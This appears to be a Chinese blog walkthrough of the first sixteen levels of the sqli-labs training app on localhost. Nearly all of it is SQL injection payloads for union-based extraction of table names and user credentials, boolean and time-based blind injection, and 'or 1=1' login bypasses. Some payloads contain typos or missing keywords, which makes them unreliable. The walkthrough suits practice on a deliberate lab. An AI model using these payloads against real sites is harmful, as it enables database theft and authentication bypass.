sqli-labs前16关wp
创始人
2024-09-25 16:23:57
0

sqli-labs第一关

在这里插入图片描述

GET传参(参数id)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=2-1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=2
在这里插入图片描述

发现id=2与id=2-1相同,可以判断出绝不是数字型,故为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’
在这里插入图片描述

在这里插入图片描述

可以判断出为 ‘ 闭合
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’–+
接下来判断列数(group/order by +二分法)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’group by 5–+
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1’group by 3–+
在这里插入图片描述

判断回显位(注意此处?id=-1’)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,3–+
在这里插入图片描述

发现2,3为回显位
爆数据库名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,user(),database()–+
在这里插入图片描述

爆表名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+
在这里插入图片描述

爆users表中的列名
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’–+
在这里插入图片描述

爆username和password的数据
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1’ union select 1,2,group_concat(username ,id , password) from users–+
在这里插入图片描述

sqli-labs第二关

在这里插入图片描述

相比于Less-1,Less-2中的id缺少’’
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-2/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-2/?id=2-1
在这里插入图片描述

Id=1与id=2-1结果相同,只有数字型符合此条件
数字型不用判断闭合方式,接下来列数,回显位以及各种宝库与Less-1一模一样,在此不再赘述。

sqli-labs第三关

在这里插入图片描述

代码审计发现闭合方式不同
首先判断为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-3/?id=1’
在这里插入图片描述

在这里插入图片描述

两个红色构成 ’) 闭合
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-3/?id=1’)–+

接下来与Less-1爆库一模一样
在这里插入图片描述

sqli-labs第四关

在这里插入图片描述

两处:
$id = ‘"’ . i d . ′ " ′ ; / / 用”“包裹 i d 参数 i d = ( id . '"'; //用”“包裹id参数 id=( id.′"′;//用”“包裹id参数id=(id) LIMIT 0,1"; //用()包裹id参数
Ok,那我首先判断为字符型,然后判断闭合方式
输入?id=1’ 和 ?id=1’)都没有报错
当我输入?id=1"时报错
在这里插入图片描述

在这里插入图片描述

可以判断出闭合方式为 ”)
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-4/?id=1")–+
在这里插入图片描述

接下来与Less-1爆库一模一样

sqli-labs第五关

在这里插入图片描述

查看源码,感觉没啥特殊的
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=-1
在这里插入图片描述

通过这两个payload发现页面只有True和False
可以采用布尔盲注和时间盲注
首先根据页面真假值判断为字符型及闭合方式
采取布尔盲注
id=1’ and ascii(substr(‘查询语句’,1,1))>97 --+
加上二分法,可以对database()的字符进行逐个判断
或者通过pythoni脚本来判断
查询表名
?id=-1’ ascii(substr((select tabel_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100–+
查询列名
?id=-1’ ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),1,1))>100–+
查询用户名和密码

?id=-1’ ascii(substr((select username from users limit 0,1),1,1))>100–+
?id=-1’ ascii(substr((select password from users limit 0,1),1,1))>100–+

sqli-labs第六关

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=-1
在这里插入图片描述

Less-6也是,盲注
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=1"–+
在这里插入图片描述

字符型,闭合方式为 “
除了闭合方式,其他都与Less-5一模一样

sqli-labs第七关

在这里插入图片描述

逐个测试,发现只有当闭合方式为’))时,页面回显True
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=1’))–+
在这里插入图片描述

盲注
除了闭合方式,其他都与Less-5一模一样

sqli-labs第八关

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1’–+
在这里插入图片描述

判断为字符型和 ‘ 闭合
盲注
除了闭合方式,其他都与Less-5一模一样

sqli-labs第九关

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=-1
在这里插入图片描述

发现不管输入啥值,页面没变化
可以采用时间盲注 if+sleep()
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9/?id=1’ and sleep(3)–+
判断出闭合方式为 ‘

查询表名
?id=-1’ and if(ascii(substr((select tabel_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(0),sleep(3))–+
查询列名
?id=-1’ and if(ascii(substr((seecet column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),1,1))>100,sleep(0),sleep(3))–+
查询用户名和密码
?id=-1’ and if(ascii(substr((select username from users limit 0,1),1,1))>100,sleep(0),sleep(3))–+
?id=-1’ and if(ascii(substr((select password from users limit 0,1),1,1))>100,sleep(0),sleep(3))–+

sqli-labs第十关

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id=1 and sleep(3)–+
不会执行sleep(3),判断出为字符型
http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10/?id=1" and sleep(3)–+
会执行sleep(3),判断闭合方式为 “
其他都和Less-9一模一样

sqli-labs第十一关在这里插入图片描述

从这一关开始为POST提交,通过代码审计发现,POST参数有两个,分别是uname和passwd

uname=1&passwd=1
在这里插入图片描述

uname=1’
&passwd=1
在这里插入图片描述

判断出闭合方式为 ‘
uname=1’ group by 3 #
&passwd=1
在这里插入图片描述

法一:
页面有报错回显,可以进行报错注入
爆出用户名和密码

法二:
使用万能密钥,绕过代码验证逻辑
uname=1’or 1=1 #
&passwd=1

在这里插入图片描述

sqli-labs第十二关

在这里插入图片描述

uname=1"
&passwd=1
在这里插入图片描述

页面报错,判断出为 “) 闭合
构造万能密钥
uname=1") or 1=1#
&passwd=1
在这里插入图片描述

刚刚测试了一下发现也可以采用报错注入进行操作

sqli-labs第十三关

在这里插入图片描述

uname=1’
&passwd=1

在这里插入图片描述

闭合方式为 ‘)

法一:
构造万能密钥
uname=1’) or 1=1 #
&passwd=1
在这里插入图片描述

uname=1’) union select 1,2 #
&passwd=1
在这里插入图片描述

法二:
这一关没有报错回显,那我可以采取sleep()进行时间盲注

sqli-labs第十四关

在这里插入图片描述

uname=1"
&passwd=1
在这里插入图片描述

判断出闭合方式为 “
uname=1" or 1=1 #
&passwd=1
在这里插入图片描述

这一关依旧没有回显,但是sleep()也不能执行,有可能被过滤了,前面几关也有可能被过滤了,难受
发现使用union select+sleep()可以执行,而and+sleep()不能执行,不知道为啥!!!
uname=1" union select 1,if(ascii(substr(database(),2,1))> 100,sleep(3),0) #
&passwd=1

sqli-labs第十五关

在这里插入图片描述

第十五关和第十一关一样,只是不产生报错信息。这就是明显的布尔盲注。因为还有错误页面和正确页面进行参考。
直接构造万能密钥
uname=1’ or 1=1 #
&passwd=1

在这里插入图片描述

简单测试了一下,布尔盲注也可以
uname=1’ union select 1,ascii(substr(database(),1,1))>97 #
&passwd=1
然后可以采用python脚本

sqli-labs第十六关

uname=1") or 1=1 #
&passwd=1
在这里插入图片描述

uname=1") union select 1,ascii(substr(database(),1,1))>97 #
&passwd=1
也以采用布尔盲注进行注入

相关内容

热门资讯

联想笔记本bios讲解(联想笔... 大家好!小编今天给大家解答一下有关联想笔记本bios讲解,以及分享几个联想笔记本bios介绍对应的知...
笔记本没电后关机会怎么样-笔记... 朋友们,你们知道笔记本没电后关机这个问题吗?如果不了解该问题的话,小编将详细为你解答,希望对你有所帮...
笔记本gtx970m能玩什么游... 各位访客大家好!今天小编关注到一个比较有意思的话题,就是关于gtx970游戏笔记本的问题,于是小编就...
笔记本怎么自己装系统,笔记本如... 大家好呀!今天小编发现了笔记本怎么自己装系统的有趣问题,来给大家解答一下,别忘了关注本站哦,现在我们...
杭州华为笔记本批发_杭州笔记本... 大家好呀!今天小编发现了杭州华为笔记本批发的有趣问题,来给大家解答一下,别忘了关注本站哦,现在我们开...
笔记本两个风扇的作用,笔记本两... 朋友们,你们知道笔记本两个风扇的作用这个问题吗?如果不了解该问题的话,小编将详细为你解答,希望对你有...
笔记本怎么增强wifi信号接收... 大家好!小编今天给大家解答一下有关笔记本怎么增强wifi,以及分享几个笔记本怎么增强wifi信号接收...
笔记本vr设备推荐 可以调试v... 各位访客大家好!今天小编关注到一个比较有意思的话题,就是关于可以调试vr的笔记本的问题,于是小编就整...
南通联想笔记本电脑售后维修服务... 大家好呀!今天小编发现了南通联想笔记本的有趣问题,来给大家解答一下,别忘了关注本站哦,现在我们开始阅...
笔记本电脑连网络受限_笔记本连... 接下来,给各位带来的是笔记本电脑连网络受限的相关解答,其中也会对笔记本连接网络受限进行详细解释,假如...